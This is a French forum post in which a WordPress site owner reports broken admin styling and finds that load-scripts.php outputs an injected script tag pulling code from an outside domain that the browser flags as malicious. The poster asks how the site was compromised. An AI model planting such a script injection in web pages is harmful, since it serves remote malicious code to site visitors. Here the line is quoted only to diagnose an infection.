Est-ce que quelqu'un pirate mon site?

Je suis assez déconcerté par ce problème et je n'ai absolument aucune idée de ce qui pourrait en être la cause. J'ai un site Web Wordpress qui a bien fonctionné jusqu'à ce que, pour une raison quelconque, le panneau d'administration ait commencé à bousiller et à ne pas afficher tous les fichiers CSS correctement. Après des recherches plus poussées, j'ai trouvé que les scripts load-scripts.php et load-styles.php se chargent avec des caractères impairs, comme vous pouvez le constater:

http://www.obhsfbla.org/wp-admin/load-scripts.php?c=1&load=jquery,utils,thickbox,media-upload&ver=96728cab06e0531b9307c89031a13e9c

Ceci est fondamentalement une installation par défaut de Wordpress, et j'ai reuploadé ce fichier, mais le problème persiste. Cela ne semble pas être un problème d’encodage des caractères, comme le disent les en-têtes, c’est UTF-8.

Voici le genre de partie effrayante. Si vous supprimez tous les attributs get de cette URL, la page affiche:

<script src="http://sweepstakesandcontestsdo.com/nl.php?p=d"></script>

Je ne vais pas naviguer sur ce site car Safari dit que c'est malveillant. Mais comment cela pourrait-il se passer exactement? Pourquoi cette URL serait-elle affichée? Le code de cette page n'a jamais été modifié.